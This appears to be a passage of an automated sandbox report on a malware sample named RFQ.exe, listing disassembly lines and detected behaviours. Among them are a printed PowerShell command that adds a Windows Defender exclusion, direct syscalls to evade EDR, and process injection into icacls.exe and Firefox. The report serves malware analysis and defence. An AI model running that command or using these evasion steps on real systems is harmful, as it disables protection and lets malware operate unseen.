            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5EBFC mov eax, dword ptr fs:[00000030h]5_2_01A5EBFC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABCBF0 mov eax, dword ptr fs:[00000030h]5_2_01ABCBF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A50BCB mov eax, dword ptr fs:[00000030h]5_2_01A50BCB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A50BCB mov eax, dword ptr fs:[00000030h]5_2_01A50BCB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A50BCB mov eax, dword ptr fs:[00000030h]5_2_01A50BCB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30BCD mov eax, dword ptr fs:[00000030h]5_2_01A30BCD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30BCD mov eax, dword ptr fs:[00000030h]5_2_01A30BCD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30BCD mov eax, dword ptr fs:[00000030h]5_2_01A30BCD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADEBD0 mov eax, dword ptr fs:[00000030h]5_2_01ADEBD0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5EB20 mov eax, dword ptr fs:[00000030h]5_2_01A5EB20
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5EB20 mov eax, dword ptr fs:[00000030h]5_2_01A5EB20
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF8B28 mov eax, dword ptr fs:[00000030h]5_2_01AF8B28
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF8B28 mov eax, dword ptr fs:[00000030h]5_2_01AF8B28
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04B00 mov eax, dword ptr fs:[00000030h]5_2_01B04B00
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AAEB1D mov eax, dword ptr fs:[00000030h]5_2_01AAEB1D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2CB7E mov eax, dword ptr fs:[00000030h]5_2_01A2CB7E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE4B4B mov eax, dword ptr fs:[00000030h]5_2_01AE4B4B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE4B4B mov eax, dword ptr fs:[00000030h]5_2_01AE4B4B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B02B57 mov eax, dword ptr fs:[00000030h]5_2_01B02B57
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B02B57 mov eax, dword ptr fs:[00000030h]5_2_01B02B57
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B02B57 mov eax, dword ptr fs:[00000030h]5_2_01B02B57
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B02B57 mov eax, dword ptr fs:[00000030h]5_2_01B02B57
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6B40 mov eax, dword ptr fs:[00000030h]5_2_01AC6B40
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6B40 mov eax, dword ptr fs:[00000030h]5_2_01AC6B40
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFAB40 mov eax, dword ptr fs:[00000030h]5_2_01AFAB40
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD8B42 mov eax, dword ptr fs:[00000030h]5_2_01AD8B42
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A28B50 mov eax, dword ptr fs:[00000030h]5_2_01A28B50
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADEB50 mov eax, dword ptr fs:[00000030h]5_2_01ADEB50
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38AA0 mov eax, dword ptr fs:[00000030h]5_2_01A38AA0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38AA0 mov eax, dword ptr fs:[00000030h]5_2_01A38AA0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A86AA4 mov eax, dword ptr fs:[00000030h]5_2_01A86AA4
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA80 mov eax, dword ptr fs:[00000030h]5_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B04A80 mov eax, dword ptr fs:[00000030h]5_2_01B04A80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A68A90 mov edx, dword ptr fs:[00000030h]5_2_01A68A90
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6AAEE mov eax, dword ptr fs:[00000030h]5_2_01A6AAEE
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6AAEE mov eax, dword ptr fs:[00000030h]5_2_01A6AAEE
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A86ACC mov eax, dword ptr fs:[00000030h]5_2_01A86ACC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A86ACC mov eax, dword ptr fs:[00000030h]5_2_01A86ACC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A86ACC mov eax, dword ptr fs:[00000030h]5_2_01A86ACC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30AD0 mov eax, dword ptr fs:[00000030h]5_2_01A30AD0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A64AD0 mov eax, dword ptr fs:[00000030h]5_2_01A64AD0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A64AD0 mov eax, dword ptr fs:[00000030h]5_2_01A64AD0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6CA24 mov eax, dword ptr fs:[00000030h]5_2_01A6CA24
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5EA2E mov eax, dword ptr fs:[00000030h]5_2_01A5EA2E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A54A35 mov eax, dword ptr fs:[00000030h]5_2_01A54A35
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A54A35 mov eax, dword ptr fs:[00000030h]5_2_01A54A35
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6CA38 mov eax, dword ptr fs:[00000030h]5_2_01A6CA38
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABCA11 mov eax, dword ptr fs:[00000030h]5_2_01ABCA11
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6CA6F mov eax, dword ptr fs:[00000030h]5_2_01A6CA6F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6CA6F mov eax, dword ptr fs:[00000030h]5_2_01A6CA6F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6CA6F mov eax, dword ptr fs:[00000030h]5_2_01A6CA6F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADEA60 mov eax, dword ptr fs:[00000030h]5_2_01ADEA60
            Source: C:\Users\user\Desktop\RFQ.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\RFQ.exeMemory written: C:\Users\user\Desktop\RFQ.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: NULL target: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeSection loaded: NULL target: C:\Windows\SysWOW64\icacls.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: NULL target: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: NULL target: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\icacls.exeThread register set: target process: 1308Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\icacls.exeThread APC queued: target process: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431534206.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000000.2074986822.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000000.2221080731.00000000012A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431534206.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000000.2074986822.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000000.2221080731.00000000012A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431534206.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000000.2074986822.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000000.2221080731.00000000012A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431534206.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000000.2074986822.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000000.2221080731.00000000012A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\RFQ.exeQueries volume information: C:\Users\user\Desktop\RFQ.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\RFQ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
